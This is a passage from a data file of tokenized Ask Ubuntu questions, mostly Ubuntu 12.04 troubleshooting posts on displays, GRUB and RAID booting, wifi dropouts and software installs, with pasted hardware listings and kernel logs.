generator '' content= '' gitweb/1.7.5.4 git/1.7.5.4 '' / > < meta name= '' robots '' content= '' index , nofollow '' / > < title > untitled git < /title > < link rel= '' stylesheet '' type= '' text/css '' href= '' static/gitweb.css '' / > < link rel= '' shortcut icon '' href= '' static/git-favicon.png '' type= '' image/png '' / > < /head > < body > < div class= '' page_header '' > < a title= '' git homepage '' href= '' http : //git-scm.com/ '' > < img class= '' logo '' height= '' 27 '' src= '' static/git-logo.png '' alt= '' git '' width= '' 72 '' / > < /a > < a href= '' / '' > projects < /a > / < /div > < div class= '' page_body '' > < br / > < br / > 404 - no projects found < br / > < /div > < div class= '' page_footer '' > < a class= '' rss_logo '' href= '' ? a=opml '' > opml < /a > < a class= '' rss_logo '' href= '' ? a=project_index '' > txt < /a > < /div > < script type= '' text/javascript '' src= '' static/gitweb.js '' > < /script > < /body > < /html > /etc/gitweb.conf # path to git projects ( < project > .git ) $ projectroot = `` /home/git/repositories '' ; # directory to use for temp files $ git_temp = `` /tmp '' ; # target of the home link on top of all pages # $ home_link = $ my_uri || `` / '' ; # html text to include at home page # $ home_text = `` indextext.html '' ; # file with project list ; by default , simply scan the projectroot dir . $ projects_list = `` /home/git/projects.list '' ; # stylesheet to use @ stylesheets = ( `` static/gitweb.css '' ) ; # javascript code for gitweb $ javascript = `` static/gitweb.js '' ; # logo to use $ logo = `` static/git-logo.png '' ; /etc/apache2/conf.d/gitweb alias /gitweb /usr/share/gitweb < directory /usr/share/gitweb > option followsymlinks +execcgi addhandler cgi-script .cgi < directory > i excuted this command - `` a2enmod cgi , a2enmod perl '' and already enabled .
133625	how do i get ubuntu 12.04 to detect my monitor correctly ?	i am using an old ctx monitor ( crt ) . the computer is also old ( processor is pentium 4 , 2.8 ghz ) operating with vesa drivers . ubuntu 12.04 detects this monitor as `` laptop '' ( even though it is a crt ) and will not give me any higher resolution than 1024x768 , even though xrandr tells me that the monitor can go to 1280x960 with the graphics card installed ( sis661/741/760 pci/agp ) . the sis drivers are installed but the machine will not use them . i have also used xrandr to add a new mode but the `` display '' gui does not show it . ubuntu 11.10 gave no problems . can anyone help ?
133627	dock bar , maximize , and minimize buttons disappeared after doing a `` reset to defaults '' in ccsm	recently i installed compiz configuration manager after that i went to unity under that and clicked `` reset to defaults '' . this caused the dock bar to disappear and also close maximize and minimize buttons have dissapeared for all windows.i am running ubuntu 12.04 lts . it will be really helpful if some one can help me solve this issue .
133629	dualhead x1800xt cold plug not working , but hot plug is working	when i have two monitors attached to my x1800xt during bootup , x , unity or the graphics driver crashes during the last stage ( loading ui when the monitor setup changes from mirror to extended , tty is still working , killing x does not solve the problem , after some tries both monitor just go to sleep ) . however , when i plug in the second monitor after bootup , it works fine . ( standard ubuntu 12.04 kernel ) . after updating to the newest linux 3.4rc2 kernel this problem is still present , however suspend and resume works fine with dualhead ( did n't work with the old kernel ) and the fan of the graphics card does n't go wild anymore after resume . one of the monitors is attached directly over dvi-d the other is attached with an dvi-i to vga adapter . both of them are independently working fine . in the system settings they are both identified correctly with the correct resolution , however things like rotation is buggy and kind of crashes as well . ( i have to change resolution and rotation simultaniously in order to change the rotation otherwise the system crashes ) . is there some logfile i could post where these errors would be logged ? 3d-acceleration is working on both monitors when i plug in the second monitor after bootup . lspci output : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati r520 [ radeon x1800 ] 01:00.1 display controller : advanced micro devices [ amd ] nee ati r520 [ radeon x1800 ] ( secondary ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati r520 [ radeon x1800 ] subsystem : advanced micro devices [ amd ] nee ati device 0b12 kernel driver in use : radeon kernel modules : radeon 01:00.1 display controller : advanced micro devices [ amd ] nee ati r520 [ radeon x1800 ] ( secondary ) subsystem : advanced micro devices [ amd ] nee ati device 0b13 lshw output : *-display:0 description : vga compatible controller product : r520 [ radeon x1800 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:18 memory : d0000000-dfffffff memory : ceee0000-ceeeffff ioport : d000 ( size=256 ) memory : ceec0000-ceedffff *-display:1 unclaimed description : display controller product : r520 [ radeon x1800 ] ( secondary ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress bus_master cap_list configuration : latency=0 resources : memory : ceef0000-ceefffff edit 1 : by now i also compared the two xorg.0.log files ( coldplug vs hotplug ) but i could n't find suspicous behaviour . ( only an error loading fglrx which was on both logs and is clear because i use the open source driver ) edit 2 : checked xrandr -d :0 everything seems fine to me screen 0 : minimum 320 x 200 , current 3200 x 1200 , maximum 8192 x 8192 dvi-0 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1920x1080 60.0 1600x1200 60.0 1680x1050 60.0 1280x1024 60.0 1280x960 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 720x400 70.1 s-video disconnected ( normal left inverted right x axis y axis ) dvi-1 connected 1280x1024+1920+176 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 i also checked dmesg but i was unable to find anything suspicious . could someone name another logfile to look at , or should i file a bugreport ?
133630	how do i select a layer `` sitting '' under the mouse cursor in gimp ?	i 'm using gimp to copy some layer out of a psd file , but the layers are badly named , so i want to select the correct layer by clicking on the item i wanted to copy . which tool should i use , and please provide a screenshot . another problem is that sometimes you just ca n't click anywhere on the image since its layered .
133631	how to install oracle ebs ?	i am planning install oracle ebs in one of servers running on ubuntu ( 2.6.38-11-virtual # 50-ubuntu smp mon sep 12 21:51:23 utc 2011 x86_64 x86_64 x86_64 gnu/linux ) . part of installation pre-requisite , following packages are mandatory to apply . how to apply following os packages in ubuntu ? gcc-4.1.2-14.el5.x86_64 gcc-c++-4.1.2-14.el5.x86_64 glibc-2.5-18.i686 ( 32-bit ) glibc-2.5-18.x86_64 glibc-common-2.5-18.x86_64 glibc-devel-2.5-18.i386 ( 32-bit ) glibc-devel-2.5-18.x86_64 libgcc-4.1.2-14.el5.i386 libgcc-4.1.2-14.el5.x86_64 libstdc++-devel-4.1.2-14.el5.i386 libstdc++-devel-4.1.2-14.el5.x86_64 libstdc++-4.1.2-14.el5.i386 libstdc++-4.1.2-14.el5.x86_64 make-3.81-1.1.x86_64 gdbm-1.8.0-26.2.1.i386 gdbm-1.8.0-26.2.1.x86_64 libxp-1.0.0-8.1.el5.i386 libxp-1.0.0-8.1.el5.x86_64 libaio-0.3.106-3.2.i386 libaio-0.3.106-3.2.x86_64 libgomp-4.1.2-14.el5.x86_64 sysstat-7.0.0-3.el5.x86_64 util-linux-2.13-0.45.el5.x86_64 compat-libstdc++-296-2.96-138.i386 compat-libstdc++-33-3.2.3-61.i386 compat-libstdc++-33-3.2.3-61.x86_64 elfutils-libelf-devel-0.125-3.el5.x86_64 elfutils-libelf-devel-static-0.125-3.el5.x86_64 libaio-devel-0.3.106-3.2.x86_64 unixodbc-2.2.11-7.1.i386 unixodbc-devel-2.2.11-7.1.i386 unixodbc-2.2.11-7.1.x86_64 unixodbc-devel-2.2.11-7.1.x86_64 kernel-headers-2.6.18-8.el5.x86_64 openmotif21-2.1.30-11.el5.i3861 xorg-x11-libs-compat-6.8.2-1.el.33.0.1.i386 with regards , sai
133639	how do i get a dell wireless 1350 adapter working ?	i installed ubuntu 12.04 on my dell inspiron 1150 that has a dell branded wireless adapter . it says firmware missing and does not allow me to use wifi . however i can connect with a ethernet connection . what should i do to get my dell wireless 1350 adapted to work with ubuntu ?
133646	/usr/lib/libodbc.so missing in 12.04	before upgrading to ubuntu 12.04 , i had the library libodbc.so in /usr/lib . i am pretty certain it was part of the unixodbc package . somehow it has gone missing after my last upgrade to 12.04 ( 64 bit ) , and some proprietary software depends on it . which package do i have to install to get it back ?
133647	gnome-panel has multiple rows -- how to undo that ?	on ubuntu 12.04 i use openbox with a single `` gnome-panel '' started . but after trying to configure my two screen in xinerama mode i got additional rows of panels each time x restarted . and despite i completely reverted to my one-screen-x-config the gnome-panel displayed has 4 rows ( 4 at top sreen , 4 at bottom ) only the outermost row has content , the other 3 are empty there is only one gnome-panel process running some widgets appear 4 times , too , although they run only once when i switch away from openbox using unity i am back to 1 row temporarily what went wrong here ? how do i undo that ? things that did not help : rm -rf .gnome2 .gconf/ .compiz-1/ pkill panel , and restarting it
133648	marble mouse middle click fail in 12.04	on recently upgrading to 12.04 , i find that the middle click with my logictec marble mouse does n't work any more ( formally achieved by clicking both buttons ) . anoying since i ca n't do a middle-click paste . can anyone think of an easy solution ? or should i file a bug ? ( theres 's already a launchpad question on this , and here 's the oldish ubuntu page for configuring a marble mouse .
133652	eclipse install	i 've already downloaded linux eclipse tar file from eclipse site as file named : eclipse-cpp-indigo-sr2-incubation-linux-gtk.tar.gz . now i want to install it in ubuntu 10.10 . i 'm new in ubuntu and linux . would you tell me simply and step by step how can i install it ? thanks clarification it 's eclipse c++ endigo
133667	is it safe to use btrfs ?	is it safe to use btrfs in ubuntu 12.04 ? linux kernel version : 3.2.0-24-generic architecture : x86_64 ( 64-bit )
133671	black screen when booting guest os in virtualbox after 12.04 upgrade	i 'm using an ubuntu host to run a windows 7 guest os in virtualbox . until i upgraded to 12.04 , virtualbox started and booted the guest os normally and everything was good . after i upgraded to 12.04 , whenever i tried to boot the guest os , at some point in the boot process my computer would black screen , crashing both the guest and the host . are there any ways to figure out exactly what is causing the crash ? is there a solution that will allow me to continue using virtualbox without crashing the host os ? i 'm using kernel version 3.2.0-24 and virtualbox version 4.1.12 .
133675	can i install 64-bit eclipse on 32-bit ubuntu ?	i have 64 bit core i5 configuration i have installed ubuntu studio 11.04 ( 32 bit ) on it.it 's working fine but for eclipse android development it is not working what should i do ? should i download 64 bit eclipse or first i do have 64 bit studio os and then install the rest development environment
133677	control usage for users	can any one suggest means to control usage for users ( maybe using crontab ) to do the same in 12.04 unity ? in 10.10 i was keeping control of usage for my children using timekeeper . thanks
133678	how to not get stretched pics when viewing them with shotwell	i use shotwell to organize my picture . i use it also crop and modify them . now that i have installed ubuntu 12.04 a crop picture is `` stretched '' so that it occupies the all screen . it used to keep the ratio between x and y in 11.10 any solution ? thanks , dodohjk
133679	how to move a starter from the launcher to the `` system settings '' window ?	i just installed the application computer janitor . the icon is now accessible in the unity launcher . personally i think that the unity toolbar is great for `` normal '' applications , but for system applications i prefer that they are not so easily accessible and the best place is then in the `` system settings '' window . so i can remove this icon from the unity launcher , but how can i add it to the `` system settings '' window ?
133690	how do i back up mozilla thunderbird emails when upgrading to 12.04 ?	i currently use 10.04lts and want to upgrade to 12.04lts . how do i get my inbox and sent messages backed up so that i can re-open them in the new version ?
133692	can not find softwares installed via synaptic manager after accidentally deleting sources.list	i did a fresh install of ubuntu 12.04 over my earlier 11.10.i saved the sources.list from my previous installation to another partition and replaced the sources.list in /etc/apt/ of the current installation with it , after editing it for the new distro.i got a lot of errors while using update manager so i deleted the sources.list . at the same time , i was installing a lot of packages from synaptic manager and i left the download and install for the night ( my internet connection speed is just 256kbps ) . now , i cant find any of those packages like chromium , wine and javacc installed on my computer ! even in synaptic the packages are shown as not installed.please help me out , i cant start another download and wait for 6 hours .
133696	error font render in ubuntu 12.04 64-bit ?	i have copied all font on windows 7 into ubuntu 12.04 64bit and it error to render like the picture i post below .
133703	unable to find minimized terminal	i just installed 11.10 and found that once i minimize the terminal window , i ca n't bring it back . all other windows are getting minimized to the unity launcher and i can relaunch them from there . if i go to the launcher and click on terminal a new terminal session is created and the old one is lost completely . this is the first time i am facing such a problem and all my previous installations of 11 . 10 did n't throw up any such behaviors . any suggestions ?
133705	maas post installation problem . internal server problem	i wanted to try maas out so i installed the server in virtualbox vm . after installation completion , nothing seemed to happen . i got `` internal server problem '' when i tried accessing xxx.xxx.xxx.xxx/maas . i already update and ran sudo maas createsuperuser but nothing seemed to change . looking at apache2 log i found a lot of python error . at the end of the stack is dbusexception : org.freedesktop.dbus.error.spawn.fileinvalid : can not do system-bus activation with no-user .
133714	dell n5110 - byte-dm5710bt paired but not connecting	i paired byte-dm5710bt bluetooth headset successfully but not able to connect , i am also using bluetooth mouse and it is working fine .
133718	how do i unbind ctrl-alt-t ?	after i 've upgraded to 12.04 , i can not unbind ctrl-alt-t from launching gnome-terminal anymore . i 've tried disabling it completely and assigning it to another shortcut in [ system settings - > keyboard ] - nothing helps , ctrl-alt-t still launches terminal . any ideas how to get rid of it ? btw , this breaks ctrl-alt-t in gnome-terminal itself , which is supposed to open new tab , but instead fires up new window . also , on a side-topic . this `` shortcut hell '' has been a problem since introduction of unity . shortcuts are now configured in two different places . every release they add/delete/change shortcuts - so i basically have to go and figure out how to disable/remap the ones that i use in my ide . now , it seems , you ca n't disable them completely ( e.g . alt + ` ) and have to override with another shortcut to unbind the default one . what i 'm really trying to ask here - does anyone know if there is a launchpad bug to fix this kind of behaviour , so i can vote \ track it ? or should i just create new one and see what happens ?
133720	lock screen blank	i have recently upgraded to ubuntu 12.04 . i have been having some trouble with lock screen lately . while the system is locked , i sometimes get blank screen without the lock screen . so i am unable to log back in . i have to shut down the system & restart once again . while this does not happen every-time , it nevertheless keeps happening from time to time . this usually happens when i leave the system running leaving the system to lock on its own . can anyone suggest some measure . my keyboard shortcuts or manual lock screen are both working perfectly fine .
133725	ca n't boot windows 7 after installing ubuntu 12.04 lts	( first sorry for my english. ) hi please help i ca n't find a solution i 'm searching the web 11 hours and i ca n't find a solution . : ( i ca n't boot windows 7 after installing ubuntu 12.04 lts alongside with windows . but after restarting the pc and when i hit enter on grub 2 for windows 7 , i get a black screen for 2 seconds and then its return back to grub . but when i select windows 7 restore vaio care it will boot , but i do n't have an option top open cmd to fix something . please help me out . here is my bootinfo from boot-repair http : //paste.ubuntu.com/975358/
133727	ubuntu 12.04 installation on gpt + raid going into grub rescue	i have two 2tb disks . i am installing ubuntu 12.04 using the alternate version of the server cd . on the partitioning page i have done my partitioning as follows /dev/sda1 - 32 mb - bios_grub /dev/sda2 - 50 gb -raid device /dev/sda3 - 8 gb -raid device /dev/sda4 - balance full gb - raid device /dev/sdb1 - 32 mb - bios_grub /dev/sdb2 - 50 gb -raid device /dev/sdb3 - 8 gb -raid device /dev/sdb4 - balance full gb - raid device after this i have setup raid devices /dev/md0 for / ( /dev/sda2 + /dev/sdb2 ) for / ext4 /dev/md1 for swap ( /dev/sda3 + /dev/sdb3 ) for swap /dev/md2 for /home ( /dev/sda4 + /dev/sdb4 ) for /home ext4 the installation finishes it shows that it is installing grub to /dev/sda and /dev/sdb . but once the system reboots it falls into grub rescue > mode . on doing ls i can not see the md devices only hd once . i also tried booting into rescue mode with the install cd and doing grub-install /dev/sda and /dev/sdb . what am i doing wrong ? why is grub2 not detecting the raid revices ? update : i just did the same steps with ubuntu 10.04 and it worked perfectly fine . i wiped out the raid and partitions and everything and did it from scratch . i think the issue is with ubuntu 12.04 and the way it partitions 2 tb disks
133728	how to play a full album starting from unity music lens ?	if i search form music in my unity music lens i get as results single tracks ( which get played by rhythmbox if i click on them ) and albums which do n't get played if i click on them . how can i fix this ?
133730	why does n't networking work after upgrade from 11.10 to 12.04 ?	after the upgrade to 12.04 , networking is down . i can ping my router , but that 's it . ( this is a wired connection , not wi-fi ) . manually running /etc/init.d/networking restart does not help . i do n't know if it is connected , but i have also noticed 2 other issues : a popup comes up asking if i want to send an error report about a system program problem ( aptd ) in mythtv , sound and picture are no longer in sync ( graphics seems slow and klunky , like the bad old days ) none of these issues are cured by shutdown / power-off , reboot . help please , my family are going to kill me : -o
133733	can not login via unity login screen after upgrade to 12.04	logging in via the shell accessed through ctrl+alt-f1 and logging in as guest via the graphical user interface work 0o when i try to log into my standard user account via the graphical interface , the screen flashes to black for a couple of seconds and bumps me back to a pristine login screen . entering a wrong password for my user account yields the standard error message - my user account and credential verification seem to be ok . i suppose that my individual graphics configuration causes problems ... i 'm not sure how to reset that . i 've tried stopping the ui via sudo service lightdm stop executed sudo nvidia-xconfig and restarted the ui sudo service lightdm start to no avail . my workstation has a nvidia geforce 560-448 graphics card . i 've tried getting this fixed with the latest nvidia 64-bit drivers ( curl'ed from the official website ) , that is 295.49 and the latest beta driver 302.07 . anybody have an idea how to get this fixed ? your help is appreciated : )
133737	why is firefox so slow ?	after updrading to ubuntu 12.04 lts ( on a dell studio xps ) firefox is not working like it should . it takes a lot of time before launching ( > 20 seconds ) and the application is abnormally slow , not to say `` totally unusable '' i already tried to remove it and reinstall it , did not resolve the problem .
133738	ubuntu 12.04 livecd fails to boot on a dell xps 17 ( l702x )	i 'm currently running ubuntu 11.10 , upgraded from version 11.04 . i 'd like to `` refresh '' my system by reinstalling with ubuntu 12.04 . unfortunately , i get a kernel panic when trying to boot the livecd with the error `` not syncing : vfs : unable to mount root fs on unknown block ( 0,0 ) '' . i have md5ed the disc , and it was burned correctly . i 'm using the 64-bit desktop version , though i 'll try the alternate version tomorrow . i have tried common workarounds like acpi=off , but still ca n't get past the kernel panic . the important system specs : processor : i7 quad core graphics : intel + nvidia 555m ( optimus ) hard drive : 2x 500gb bios : running latest a17 version from dell i 'd be glad to file a bug report , but i 'm not sure where the problem lies . anyone having similar problems or a workaround to try ? update : for anyone reading this , the alternative cd works for me , so i suggest using that instead .
133742	create custom package - and add a private repository	while developing a custom , commercial application , i need to provide appropriate automatic updates . can i create a package that , in addition to containing my specific application , also adds it 's repository to the sources list ? is it the appropriate procedure ?
133747	clock on the menu bar not appearing	i got the fallowing error when i run the indicator-datetime-service ( process:4027 ) : libdbusmenu-glib-critical ** : dbusmenu_menuitem_property_set_variant : assertion `dbusmenu_is_menuitem ( mi ) ' failed ( process:4027 ) : libdbusmenu-glib-critical ** : dbusmenu_menuitem_property_set_variant : assertion `dbusmenu_is_menuitem ( mi ) ' failed ( process:4027 ) : indicator-datetime-warning ** : address provider changed . let 's change ** ( process:4027 ) : warning ** : metadata for error domain `` geoclue-error-quark '' already registered ( process:4027 ) : indicator-datetime-warning ** : unable to create geoclue address : address interface already started ( process:4027 ) : libindicator-warning ** : no watchers , service timing out . ( process:4027 ) : indicator-datetime-warning ** : shutting down service !
133750	how do i get tomboy sync to work ?	so i can not get tomboy to sync now after the fresh install of 12.04 . i have no way of getting the nearly 100 important notes now since 'notes ' has been taken off of 'ubuntu one ' either . when i try to 'sync ' my notes i get an error `` failed to synchronize '' . does anyone know a workaround or what 's going on with this . maybe just a flaw while ubuntu ( canonical ) get everything set for 12.04 ? any help would be greatly appreciated , i really need those notes !
133751	panel duplicated on multiple monitor	i install clean ubuntu 12.04 , and i have problem with multiple monitor configuration . i have 3 monitors on 2 video card . in 10.04 lts a have 3 top , and bottom panel and everything work fine . in 12.04 when i restart or logout/login every panels configured last time move into first ( base ) monitor . on other two monitors a new panels are created . on two others monitors background also do n't show . i have installed the drivers for my card and they work fine .
133758	how can i install lucida grande font using apt-get ?	i am looking for a package and repository from where i can install lucida grande font and eventually others .
133760	ubuntu one : client for 10.10 has no `` cloud folders '' tab	i have ubuntu 10.10 and i 've seen somewhere about the `` cloud folders '' functionality of ubuntu one , but i ca n't find it in my 10.10 version of the client . i updated my client but it 's still the same basic tabs . can anyone please tell me if it 's possible to have the `` cloud folders '' tab in my client ? if not , is there any other way to have the same functionality without upgrading my ubuntu version ? thanks guys ! ! ! : )
133762	mysql workbench hangs in opening models	i have upgraded mysql workbench to one in repos ( i purged the first version ) . it works fine with server adminstration and it opens fine previously opened file on startup but when i open another file i get the dialog to confirm closure of current file and program hangs ... until i force quit . i have googled and it seems no body else is affected . before i upgraded to natty i had updated gimp to 2.8 that affected some software ( shotwell being one of them and now it works fine ) . i 've run out of ideas and i welcome any help tia
133768	how can i start videos/music in my preferred player and not the default one using dash ?	i have ubuntu 12.04 installed and vlc is configurated as my standard video player , clementine for audio . works fine when i start a video or audio in nautilus . but whenever i start a video from dash it 's opened with the default ubuntu video player , totem . for music , rhythmbox is started . is there a way to change this behaviour ? ( i 've found this question but since it is about 10.10 maybe it 's out-dated ) edit : ok , i changed it now myself . i had to use ubuntu tweak to set all the file type endings . is there a way to do it without using ubuntu tweak ? setting the default applications in the system settings was n't enough .
133770	wireless on an acer aspire 1810t with an intel 5100agn works for less than a day , then stops working until reboot	i am running ubuntu 12.04 on an acer aspire 1810t with an intel 5100 agn wifi card that has performed flawlessly on ubuntu 10.04 . i assumed the stellar wireless support would continue with 12.04 but have run into a glitch that is a showstopper : wireless works as expected at first , and i can configure connections with network manager without any problem , including my wpa2-personal home network , but after some time ( usually a number of hours , almost always after a suspend-to-ram or hibernate ) the wireless connection drops and is unable to reconnect . the only reliable solution is to reboot , which is not a solution . before opening a bug on launchpad , i thought i 'd check and see if anyone else has managed to resolve this problem . here 's what i 've got : problem : wifi in ubuntu 12.04 64-bit stops working on the acer aspire 1810t ( intel wifi 5100 agn ) after some time , often after a suspend-to-ram . $ uname -a linux ubuntubox 3.4.0-030400rc5-generic # 201205011817 smp tue may 1 22:18:19 utc 2012 x86_64 x86_64 x86_64 gnu/linux ( note : the problem is the same when running the stock 3.2.0 kernel ) $ dmesg ( at the time the connection drops ) [ 54671.300096 ] wlan0 : authenticate with 00:24:7b:6d:32:62 ( try 1 ) [ 54671.301874 ] wlan0 : authenticated [ 54671.304312 ] wlan0 : associate with 00:24:7b:6d:32:62 ( try 1 ) [ 54671.308760 ] wlan0 : rx reassocresp from 00:24:7b:6d:32:62 ( capab=0x411 status=0 aid=3 ) [ 54671.308766 ] wlan0 : associated [ 54681.808039 ] wlan0 : no ipv6 routers present [ 54692.009142 ] wlan0 : deauthenticating from 00:24:7b:6d:32:62 by local choice ( reason=3 ) $ sudo lshw -c network *-network description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.4.0-030400rc5-generic firmware=8.83.5.1 build 33692 ip=192.168.0.102 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:44 memory : d2500000-d2501fff $ sudo lspci -v 02:00.0 network controller : intel corporation wifi link 5100 subsystem : intel corporation wifi link 5100 agn flags : bus master , fast devsel , latency 0 , irq 44 memory at d2500000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ c8 ] power management version 3 capabilities : [ d0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ e0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number kernel driver in use : iwlwifi kernel modules : iwlwifi $ cat /etc/network/interfaces auto lo iface lo inet loopback $ sudo rfkill list all 2 : phy0 : wireless lan soft blocked : no hard blocked : no 7 : acer-wireless : wireless lan soft blocked : no hard blocked : no 8 : acer-bluetooth : bluetooth soft blocked : yes hard blocked : no $ tail -f /var/log/messages ( resuming , dead wifi ) may 8 05:44:05 ubuntubox kernel : [ 12683.244181 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . may 8 05:44:05 ubuntubox kernel : [ 12683.260253 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . may 8 05:44:05 ubuntubox kernel : [ 12683.276244 ] suspending console ( s ) ( use no_console_suspend to debug ) may 8 05:44:05 ubuntubox kernel : [ 12683.280511 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache may 8 05:44:05 ubuntubox kernel : [ 12683.280794 ] sd 0:0:0:0 : [ sda ] stopping disk may 8 05:44:05 ubuntubox kernel : [ 12683.600255 ] pm : suspend of devices complete after 323.607 msecs may 8 05:44:05 ubuntubox kernel : [ 12683.600259 ] pm : suspend devices took 0.324 seconds may 8 05:44:05 ubuntubox kernel : [ 12683.600492 ] pm : late suspend of devices complete after 0.228 msecs may 8 05:44:05 ubuntubox kernel : [ 12683.616373 ] ehci_hcd 0000:00:1d.7 : wake-up capability enabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.632226 ] uhci_hcd 0000:00:1d.2 : wake-up capability enabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.632286 ] uhci_hcd 0000:00:1d.1 : wake-up capability enabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.632345 ] uhci_hcd 0000:00:1d.0 : wake-up capability enabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.632521 ] ehci_hcd 0000:00:1a.7 : wake-up capability enabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.648212 ] uhci_hcd 0000:00:1a.0 : wake-up capability enabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.648281 ] pm : noirq suspend of devices complete after 47.784 msecs may 8 05:44:05 ubuntubox kernel : [ 12683.648929 ] acpi : preparing to enter system sleep state s3 may 8 05:44:05 ubuntubox kernel : [ 12683.649057 ] pm : saving platform nvs memory may 8 05:44:05 ubuntubox kernel : [ 12683.650636 ] disabling non-boot cpus ... may 8 05:44:05 ubuntubox kernel : [ 12683.652187 ] cpu 1 is now offline may 8 05:44:05 ubuntubox kernel : [ 12683.652845 ] acpi : low-level resume complete may 8 05:44:05 ubuntubox kernel : [ 12683.652845 ] pm : restoring platform nvs memory may 8 05:44:05 ubuntubox kernel : [ 12683.652845 ] enabling non-boot cpus ... may 8 05:44:05 ubuntubox kernel : [ 12683.652845 ] booting node 0 processor 1 apic 0x1 may 8 05:44:05 ubuntubox kernel : [ 12683.668170 ] cpu1 is up may 8 05:44:05 ubuntubox kernel : [ 12683.671401 ] acpi : waking up from system sleep state s3 may 8 05:44:05 ubuntubox kernel : [ 12683.793414 ] uhci_hcd 0000:00:1a.0 : wake-up capability disabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.793500 ] ehci_hcd 0000:00:1a.7 : wake-up capability disabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.793817 ] uhci_hcd 0000:00:1d.0 : wake-up capability disabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.793886 ] uhci_hcd 0000:00:1d.1 : wake-up capability disabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.793954 ] uhci_hcd 0000:00:1d.2 : wake-up capability disabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.794037 ] ehci_hcd 0000:00:1d.7 : wake-up capability disabled by acpi may 8 05:44:05 ubuntubox kernel : [ 12683.794755 ] pm : noirq resume of devices complete after 1.559 msecs may 8 05:44:05 ubuntubox kernel : [ 12683.794994 ] pm : early resume of devices complete after 0.177 msecs may 8 05:44:05 ubuntubox kernel : [ 12683.795387 ] usb usb3 : root hub lost power or was reset may 8 05:44:05 ubuntubox kernel : [ 12683.795615 ] usb usb4 : root hub lost power or was reset may 8 05:44:05 ubuntubox kernel : [ 12683.795665 ] usb usb5 : root hub lost power or was reset may 8 05:44:05 ubuntubox kernel : [ 12683.795713 ] usb usb6 : root hub lost power or was reset may 8 05:44:05 ubuntubox kernel : [ 12683.798755 ] power_supply bat1 : parent pnp0c0a:00 should not be sleeping may 8 05:44:05 ubuntubox kernel : [ 12684.040051 ] usb 2-5 : reset high-speed usb device number 2 using ehci_hcd may 8 05:44:05 ubuntubox kernel : [ 12684.120062 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) may 8 05:44:05 ubuntubox kernel : [ 12684.124050 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) may 8 05:44:05 ubuntubox kernel : [ 12684.132111 ] ata7 : sata link down ( sstatus 0 scontrol 300 ) may 8 05:44:05 ubuntubox kernel : [ 12687.196167 ] ata2 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) may 8 05:44:05 ubuntubox kernel : [ 12687.215180 ] ata2.00 : configured for udma/133 may 8 05:44:05 ubuntubox kernel : [ 12687.228167 ] sd 0:0:0:0 : [ sda ] starting disk may 8 05:44:05 ubuntubox kernel : [ 12687.249349 ] pm : resume of devices complete after 3454.346 msecs may 8 05:44:05 ubuntubox kernel : [ 12687.249624 ] pm : resume devices took 3.456 seconds may 8 05:44:05 ubuntubox kernel : [ 12687.249848 ] restarting tasks ... done . may 8 05:44:05 ubuntubox kernel : [ 12687.316278 ] video lnxvideo:00 : restoring backlight state may 8 05:44:05 ubuntubox kernel : [ 12687.518981 ] cfg80211 : calling crda to update world regulatory domain may 8 05:44:05 ubuntubox kernel : [ 12687.555609 ] cfg80211 : world regulatory domain updated : may 8 05:44:05 ubuntubox kernel : [ 12687.555618 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 8 05:44:05 ubuntubox kernel : [ 12687.555627 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:05 ubuntubox kernel : [ 12687.555635 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:05 ubuntubox kernel : [ 12687.555642 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:05 ubuntubox kernel : [ 12687.555650 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:05 ubuntubox kernel : [ 12687.555657 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:05 ubuntubox kernel : [ 12687.563241 ] intel ( r ) wireless wifi link agn driver for linux , in-tree : may 8 05:44:05 